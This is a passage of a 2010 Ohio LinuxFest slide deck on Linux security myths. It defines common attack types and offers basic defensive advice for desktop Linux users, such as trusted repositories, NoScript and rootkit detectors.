  • 13. Vocabulary Rootkit A rootkit keeps the activities of an unauthorised user hidden so that you can’t tell your system has been owned. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 12 / 35
  • 14. Vocabulary Keylogger A keylogger tracks everything you type. Yes, including passwords. It could be hardware (see ThinkGeek), but usually software. There are legitimate(-ish) uses. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 13 / 35
  • 15. Vocabulary Browser-based Attack A browser-based attack is any attack that takes place inside the web browser. They are usually not limited to a specific OS. Examples: Cross-site Scripting (XSS) – using Javascript on one webpage to steal data from another Tracking cookies – harvests the information stored in your browser by other websites Cookie jacking – stealing credentials for other websites from your browser’s cookies Click jacking – hiding clickable objects on a webpage on top of other objects so that you’re not clicking what you think you’re clicking Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 14 / 35
  • 16. Vocabulary Phishing Phishing is social engineering aimed at making you believe you are interacting with someone else whom you trust Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 15 / 35
  • 17. What can still hurt me? Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 16 / 35
  • 18. What can still hurt me? What’s still a problem? All of those Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 17 / 35
  • 19. What can still hurt me? But what about no viruses? Windows ones usually won’t run, even in Wine Several hundred for Linux Only ∼30 in the wild ever No known viruses exploiting current vulnerabilities Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 18 / 35
  • 20. What can still hurt me? Email Trojans “Check out this cool new game! http://example.com/foo.desktop” Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 19 / 35
  • 21. What can still hurt me? Untrusted Software .deb for “screensaver” on gnome-look.org Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 20 / 35
  • 22. What can still hurt me? Untrusted Software .deb for “screensaver” on gnome-look.org . . . and now you’re on a botnet http://ubuntuforums.org/showthread.php?t=1349678 Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 20 / 35
  • 23. What can still hurt me? Browser-based attacks Unless only for Internet Explorer Firefox? Opera? Chrome? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 21 / 35
  • 24. What can still hurt me? Phishing There’s no patch for gullibility Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 22 / 35
  • 25. What can still hurt me? Rootkits If any of the previous work, the attacker might install one Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 23 / 35
  • 26. What protection is there? Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 24 / 35
  • 27. What protection is there? Trusted software sources Stick to your distro’s repos Otherwise, source directly from upstream Avoid non-software in .deb or .rpm format Heed warnings about failed signature checks Arch Linux does not sign packages Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 25 / 35
  • 28. What protection is there? Launchers You get a .desktop from web/email. . . Do you know what it’ll run? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 26 / 35
  • 29. What protection is there? Launchers You get a .desktop from web/email. . . Do you know what it’ll run? Could be anything Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 26 / 35
  • 30. What protection is there? Launchers in KDE Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 27 / 35
  • 31. What protection is there? Launchers in GNOME Fedora’s & openSUSE’s GNOME: Ubuntu’s GNOME: Ubuntu has a policy against “ignore this security warning” buttons Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 28 / 35
  • 32. What protection is there? Browser - Javascript Use NoScript Users might not be equipped to know what to allow, but it blocks cross-site scripting & click-jacking Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 29 / 35
  • 33. What protection is there? Browser - Encryption Don’t send passwords unencrypted! Lock icon: Means connection is encrypted and probably no man-in-the-middle NOT necessarily a sign that all is good! Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 30 / 35
  • 34. What protection is there? Browser - Phishing But how do you know it’s the site it claims to be? Look at everything before the third slash—that’s the domain Check out this green thing Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 31 / 35
  • 35. What protection is there? Minimal privileges Don’t login graphically as root! Why? Malware gets full access Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 32 / 35
  • 36. What protection is there? Don’t need it? Don’t use it! Don’t login remotely with command line or push files to it? Uninstall your SSH and S/FTP servers Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 33 / 35
  • 37. What protection is there? Detecting problems Find rootkits: rkhunter chkrootkit Warn of changes: tripwire Warn of attacks: snort These are advanced tools Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 34 / 35
  • 38. What protection is there? Questions? Slides will be posted: http://ubuntulinuxtipstricks.blogspot.com Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 35 / 35